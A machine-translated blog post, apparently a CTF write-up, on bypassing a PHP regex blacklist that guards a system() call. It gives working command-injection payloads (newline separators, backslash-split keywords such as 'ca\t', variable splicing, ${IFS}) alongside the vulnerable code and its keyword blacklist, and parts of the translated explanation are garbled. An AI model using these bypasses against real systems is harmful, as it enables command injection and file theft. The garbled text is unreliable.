unctf remember a command bypass

Others 2020-01-28 23:37:22 views: null

0x01 paste the code

<?php
    highlight_file(__FILE__);
    $a = $_GET['a'];
    $b = $_GET['b'];

 // try bypass it
    if (preg_match("/\'|\"|,|;|\`|\\|\*|\n|\t|\xA0|\r|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $a))
        $a = "";
        $a ='"' . $a . '"';
    if (preg_match("/\'|\"|;|,|\`|\*|\\|\n|\t|\r|\xA0|\{|\}|\(|\)|<|\&[^\d]|@|\||tail|bin|less|more|string|nl|pwd|cat|sh|flag|find|ls|grep|echo|w/is", $b))
        $b = "";
        $b = '"' . $b . '"';
     $cmd = "file $a $b";
     str_replace(" ","","$cmd"); 
     system($cmd);
?>


0x02 analysis

The first is filtered cat, more and flag and other words, here you can use \to bypass, for example c\at fla\g.php, (here the reason may be \because the title preg_matchin \\the wording of the equivalent of no filter \), and we know linux, the line breaks can be a as command separators.
php regular little vulnerability, two slashes thrown phponly a slash, and then thrown into the slashes to escape to the regular
Due to this small flaw, A is filtered |*instead *, b was filtered |\n, instead of being filtered\n

payload: http://127.0.0.1/?a=\&b=%0Aca\t%20index.php%0A
the $cmd var_dumpresult of string(27) "file "\" " ca\t index.php "" "(the middle of a line break)



0x03 knowledge summary

1, the command added \for bypassing the keyword filters
2, can also be used to bypass such an environment variable value ${path:0:1}, but here the filter {}, this method can not be used, enva command can display all the variables environment
3, for two command filter Circumvention methods species, is a linux, wildcard ?bypass, such as varwrittenv?r

expr${IFS}substr${IFS}“this is a test”${IFS}3${IFS}5

3, can use the command to bypass the splicing manner a=1;b=s;$a$b, semicolons to %0Anewline to http://127.0.0.1/?a=\&b=%0Ac=ca%0Ad=t%0A$c$d index.php%0A
4, different systems different closings

  • In Unix systems, the end of each row only "<wrap>", i.e., "\ n" (% 0A)
  • Win in the system, the end of each line is "<ENTER> <line feed>", i.e., "\ r \ n"
  • On the Mac, the end of each line is "<Enter>", that is, "\ r" (% 0D)
HyyMbb
Published 47 original articles · won praise 2 · Views 3149
Private letter concerns

Guess you like

Origin blog.csdn.net/a3320315/article/details/102776426
Recommended
LFOSSA Yuanlaisusu Open Course | Mastering the Cloud Native Future: Comprehensive Guide to CNCF Certification and Exam Preparation Tips
Ranking
C++ Basic Syntax
bootstrapTable hides a column based on a condition
Why is reentrant lock recommended instead of Synchronized when dynamic high concurrency?
hexo create a blog
[Fully open source and non-encrypted version] Imitation of the eighth district distribution/online signature/multiple sets of download templates/APP distribution hosting/APP packaging and packaging
Polymerization combination
https://www.flysnow.org/2017/05/06/go-in-action-go-log.html
From the perspective of Flutter and the front-end, talk about how to ensure UI fluency under the single-threaded model
nginx-301, 302 redirect
Geolocation by IP Address in ASP.NET
Daily
More
2024-04-26(22)
2024-04-25(32)
2024-04-24(30)
2024-04-23(30)
2024-04-22(5)
2024-04-21(0)
2024-04-20(6)
2024-04-19(5)
2024-04-18(0)
2024-04-17(31)

Code World

© 2018 codetd.com